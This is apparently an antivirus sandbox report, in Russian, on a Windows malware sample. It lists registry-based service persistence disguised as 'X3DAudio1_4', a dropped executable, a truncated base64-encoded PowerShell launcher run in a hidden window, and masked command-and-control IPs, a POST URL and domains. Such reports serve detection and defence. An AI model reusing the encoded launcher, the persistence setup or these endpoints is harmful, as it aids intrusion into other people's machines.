Техническая информация
Для обеспечения автозапуска и распространения
Устанавливает следующие настройки сервисов
- [<HKLM>\System\CurrentControlSet\Services\X3DAudio1_4] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\X3DAudio1_4] 'ImagePath' = '"%WINDIR%\SysWOW64\FwRemoteSvr\X3DAudio1_4.exe"'
Создает следующие сервисы
- 'X3DAudio1_4' "%WINDIR%\SysWOW64\FwRemoteSvr\X3DAudio1_4.exe"
- 'X3DAudio1_4' %WINDIR%\SysWOW64\FwRemoteSvr\X3DAudio1_4.exe
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABiAGEAZQBwAHQAbwB1AHAAbQBvAHoAcQB1AGEAcQB1AGcAdQByAD0AJwBnAGEAaQByAGYAbwBvAHYAdwBpAGEAdABoAHQAYQBlAGcAcABvAHUAbQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6AD...
Изменения в файловой системе
Создает следующие файлы
- %HOMEPATH%\677.exe
Удаляет следующие файлы
- %HOMEPATH%\677.exe
Перемещает следующие файлы
- %HOMEPATH%\677.exe в %WINDIR%\syswow64\fwremotesvr\x3daudio1_4.exe
Подменяет следующие файлы
- %HOMEPATH%\677.exe
Сетевая активность
Подключается к
- '10#.#17.53.230':443
- '21#.#1.142.238':8080
TCP
Запросы HTTP POST
- http://21#.##.142.238:8080/sYpARC9Hf/zamCEwaC6/frjfnlDTkALa8/SrC7yWPvOa7k/NPTg9u/7jomihSz2a8/ via 21#.#1.142.238
UDP
- DNS ASK to###meus.com
- DNS ASK cp##s.net
- DNS ASK ty##s2c.com
- DNS ASK th####erservice.com
- DNS ASK ss##e.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABiAGEAZQBwAHQAbwB1AHAAbQBvAHoAcQB1AGEAcQB1AGcAdQByAD0AJwBnAGEAaQByAGYAbwBvAHYAdwBpAGEAdABoAHQAYQBlAGcAcABvAHUAbQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6AD...' (со скрытым окном)
